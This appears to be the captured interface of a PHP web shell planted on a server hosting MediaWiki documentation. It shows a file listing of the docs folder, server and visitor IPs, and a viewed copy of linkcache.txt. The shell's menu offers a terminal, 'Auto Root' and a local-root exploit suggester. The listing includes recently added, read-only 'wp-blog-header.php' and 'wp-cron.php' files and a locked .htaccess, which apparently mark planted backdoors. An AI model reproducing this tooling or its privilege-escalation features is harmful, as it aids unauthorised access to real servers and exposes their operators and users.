Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
wiki.bernardino.org /
docs /
Delete
Unzip
Name
Size
Permission
Date
Action
code-coverage
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
databases
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
html
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
kss
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
php-memcached
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
uidesign
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
.htaccess
197
B
-r--r--r--
2026-08-22 08:29
README
830
B
-rw-r--r--
2016-11-28 20:20
contenthandler.txt
10.8
KB
-rw-r--r--
2016-11-28 20:20
database.txt
8.62
KB
-rw-r--r--
2016-11-28 20:20
deferred.txt
1.63
KB
-rw-r--r--
2016-11-28 20:20
design.html
526
B
-rw-r--r--
2011-05-14 18:46
design.txt
5
KB
-rw-r--r--
2016-11-28 20:20
distributors.txt
11.28
KB
-rw-r--r--
2016-11-28 20:20
doxygen_first_page.php
480
B
-rw-r--r--
2016-11-28 20:20
export-0.1.xsd
2.28
KB
-rw-r--r--
2016-11-28 20:20
export-0.10.xsd
9.93
KB
-rw-r--r--
2016-11-28 20:20
export-0.2.xsd
3.05
KB
-rw-r--r--
2016-11-28 20:20
export-0.3.xsd
4.7
KB
-rw-r--r--
2016-11-28 20:20
export-0.4.xsd
7.21
KB
-rw-r--r--
2016-11-28 20:20
export-0.5.xsd
7.32
KB
-rw-r--r--
2016-11-28 20:20
export-0.6.xsd
7.59
KB
-rw-r--r--
2016-11-28 20:20
export-0.7.xsd
9.2
KB
-rw-r--r--
2016-11-28 20:20
export-0.8.xsd
9.73
KB
-rw-r--r--
2016-11-28 20:20
export-0.9.xsd
9.85
KB
-rw-r--r--
2016-11-28 20:20
export-demo.xml
6.22
KB
-rw-r--r--
2016-11-28 20:20
extension.schema.json
17.55
KB
-rw-r--r--
2016-11-28 20:20
globals.txt
2.14
KB
-rw-r--r--
2016-11-28 20:20
hooks.txt
164.15
KB
-rw-r--r--
2016-11-28 20:20
injection.txt
14.58
KB
-rw-r--r--
2016-11-28 20:20
language.txt
168
B
-rw-r--r--
2016-11-28 20:20
linkcache.txt
973
B
-rw-r--r--
2016-11-28 20:20
logger.txt
3.55
KB
-rw-r--r--
2016-11-28 20:20
magicword.txt
3.04
KB
-rw-r--r--
2016-11-28 20:20
maintenance.txt
1.65
KB
-rw-r--r--
2016-11-28 20:20
memcached.txt
7.73
KB
-rw-r--r--
2016-11-28 20:20
schema.txt
360
B
-rw-r--r--
2016-11-28 20:20
scripts.txt
2.21
KB
-rw-r--r--
2016-11-28 20:20
sitelist-1.0.xsd
2
KB
-rw-r--r--
2016-11-28 20:20
sitelist.txt
3.07
KB
-rw-r--r--
2016-11-28 20:20
sitescache.txt
1.02
KB
-rw-r--r--
2016-11-28 20:20
skin.txt
3.03
KB
-rw-r--r--
2016-11-28 20:20
title.txt
3.88
KB
-rw-r--r--
2016-11-28 20:20
upload.txt
135
B
-rw-r--r--
2009-08-26 19:05
wp-blog-header.php
2.74
KB
-r--r--r--
2026-08-22 08:29
wp-cron.php
2.74
KB
-rw-r--r--
2026-08-22 08:29
Save
Rename
linkcache.txt The LinkCache class maintains a list of article titles and the information about whether or not the article exists in the database. This is used to mark up links when displaying a page. If the same link appears more than once on any page, then it only has to be looked up once. In most cases, link lookups are done in batches with the LinkBatch class, or the equivalent in Parser::replaceLinkHolders(), so the link cache is mostly useful for short snippets of parsed text (such as the site notice), and for links in the navigation areas of the skin. The link cache was formerly used to track links used in a document for the purposes of updating the link tables. This application is now deprecated. To create a batch, you can use the following code: $pages = array( 'Main Page', 'Project:Help', /* ... */ ); $titles = array(); foreach( $pages as $page ){ $titles[] = Title::newFromText( $page ); } $batch = new LinkBatch( $titles ); $batch->execute();